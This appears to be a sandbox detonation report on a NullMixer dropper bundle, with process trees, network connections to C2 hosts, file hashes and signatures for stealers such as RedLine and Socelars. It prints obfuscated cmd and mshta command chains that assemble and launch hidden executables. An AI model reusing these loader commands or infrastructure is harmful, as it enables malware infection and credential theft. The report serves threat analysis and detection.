C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct ( "WscRiPt.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"

C:\Windows\SysWOW64\msiexec.exe

msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 480

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ppp-gl.biz udp
US 8.8.8.8:53 hsiens.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 104.155.138.21:80 ppp-gl.biz tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 topniemannpickshop.cc udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 niemannbest.me udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 104.155.138.21:80 ppp-gl.biz tcp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 104.155.138.21:80 ppp-gl.biz tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 107.178.223.183:80 ppp-gl.biz tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.83:80 crl.microsoft.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
N/A 127.0.0.1:49285 tcp
N/A 127.0.0.1:49287 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe

MD5 789258af8927e9426e113f79a5c2ebcf
SHA1 6c64f717f5fc68e602760fefbc2221fd35fd7530
SHA256 f17e3e76cebd7d97c927151c727d210dca439be0142db2db5a0ccc70d95b9923
SHA512 20cbd892411768fd4774fcb9f47f4eff754687808e58af8597714030e0705b53072b0128b8c32f5254836664276b242f8327427d0d6975cdfe6c3a90f4945ec3

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2280-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2280-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2280-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2280-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2280-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2280-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-78-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2280-77-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2280-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2280-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe

MD5 ba8541c57dd3aae16584e20effd4c74c
SHA1 5a49e309db2f74485db177fd9b69e901e900c97d
SHA256 dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c
SHA512 1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe

MD5 1902e1df4ecf3bf7bcfc0c53b992cd24
SHA1 a0c9cde0b2113466a820fa6ebcccfdcd93b26b97
SHA256 c3bf5a1821e67a8d734ce91cb75b6878457f69ea3211a6c1405bfd30759f2720
SHA512 37dbad160b91e1fc2079a46e77c8d261ad4f4dbbdfcc4d1c5ea70beeb10d271d48a13ef3b3c76a4878b4187d08a66097cb5a8cf77531a4c0df5914d3be2296b6

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe

MD5 39fbed3967544cc6a59e1d1152cdcc35
SHA1 b9e974a506f3be7fc78574ae008e7686093eb82d
SHA256 cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6
SHA512 cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe

MD5 a98672182143436478fdb3806ef6cd5a
SHA1 5d93bb55d9e7915afb11361f42a4c9c6393718b3
SHA256 2010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528
SHA512 0d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe

MD5 37a1c118196892aa451573a142ea05d5
SHA1 4144c1a571a585fef847da516be8d89da4c8771e
SHA256 a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a
SHA512 aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe

MD5 ecc773623762e2e326d7683a9758491b
SHA1 ad186c867976dc5909843418853d54d4065c24ba
SHA256 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838
SHA512 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4

memory/1444-132-0x0000000000400000-0x0000000000414000-memory.dmp

memory/372-131-0x00000000002A0000-0x00000000002A8000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri200ae385720d3.exe

MD5 8aaec68031b771b85d39f2a00030a906
SHA1 7510acf95f3f5e1115a8a29142e4bdca364f971f
SHA256 dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b
SHA512 4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df

memory/1928-143-0x0000000001030000-0x0000000001048000-memory.dmp

memory/1704-142-0x0000000000B40000-0x0000000000BB2000-memory.dmp

memory/1748-156-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-5T6MP.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1444-155-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1928-168-0x0000000000370000-0x0000000000376000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5T6MP.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/1864-154-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1916-174-0x00000000003E0000-0x0000000000404000-memory.dmp

memory/1916-177-0x0000000003180000-0x00000000031A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe

MD5 85ef31a707d583032b8526d16e8883a8
SHA1 16beed53fc46bf75cf4081d73dc843f4d8298569
SHA256 bce2f04e884c2dd6e799861898546be00a745fa1e743ce51044d2232065d2409
SHA512 8e2ca4555b5741400559244bd37e0be09b18e246026e3d0507b02956c27fdc9dabca55672cbd8a52a5832fe66c6da3fe1e649a1cfad101f9c655aa20aa1da31b

memory/2696-198-0x00000000027F0000-0x000000000293C000-memory.dmp

memory/1244-201-0x0000000002750000-0x0000000002979000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe

MD5 44cfc728f9fbacd834c9b10ce768d41a
SHA1 6589a1435a2ba5ec11a312de5f339597831227d0
SHA256 874c4eab9d0422ee52a1e02e4e95b07805a143dda5a54a19c6a122580aabdb68
SHA512 dd899e05bcbfaec1c3f46011367e000f3edfca1c2f542f9ed55bcbd136142940733f8aa8cd67bd5f647329195ffb843a255713dae362bc44a817734163409113

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe

MD5 d08cc10c7c00e13dfb01513f7f817f87
SHA1 f3adddd06b5d5b3f7d61e2b72860de09b410f571
SHA256 0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d
SHA512 0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209c4b463b.exe

MD5 a729d63514511766fcdd2de19cdbd017
SHA1 737827e5c0ab0adc287d3b3bb16d26a9a42f0939
SHA256 6dda16414ec5a7f6908f6088ea5edb7c67b024c3f695fbf7048ab823bcfee728
SHA512 ad6bc65c950a94383f3f1d987508d22167343db632412b74d4734482916a7c18981dc8d84c57109f0882f6c5c6f280db876bafd24837f06996614d1bb9ce6ee2

memory/2280-211-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-210-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2280-209-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2280-208-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2280-206-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2280-202-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe

MD5 7d44a083f0e81baf1ecb264b93bdc9a5
SHA1 4dd23b40065e2ccfbdd4c79386d7e2d37a53efce
SHA256 073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5
SHA512 245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82

memory/1696-222-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-221-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-220-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1696-218-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-216-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-214-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-212-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe

MD5 06ee576f9fdc477c6a91f27e56339792
SHA1 4302b67c8546d128f3e0ab830df53652f36f4bb0
SHA256 035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8
SHA512 e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616

memory/2696-225-0x0000000002D80000-0x0000000002E25000-memory.dmp

memory/2696-232-0x0000000002E30000-0x0000000002EC2000-memory.dmp

memory/2696-229-0x0000000002E30000-0x0000000002EC2000-memory.dmp

memory/1916-234-0x0000000000400000-0x00000000016E0000-memory.dmp

memory/1984-233-0x0000000000400000-0x00000000016D5000-memory.dmp

memory/2228-249-0x0000000000400000-0x00000000016BC000-memory.dmp

memory/1560-251-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1244-252-0x0000000002D60000-0x0000000002E08000-memory.dmp

memory/1748-250-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1244-253-0x0000000002E10000-0x0000000002EA5000-memory.dmp

memory/1244-256-0x0000000002E10000-0x0000000002EA5000-memory.dmp

memory/1244-258-0x0000000002750000-0x0000000002979000-memory.dmp

memory/2696-257-0x00000000027F0000-0x000000000293C000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 21:35

Reported

2024-11-24 21:37

Platform

win10v2004-20241007-en

Max time kernel

11s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri200ae385720d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3456 set thread context of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
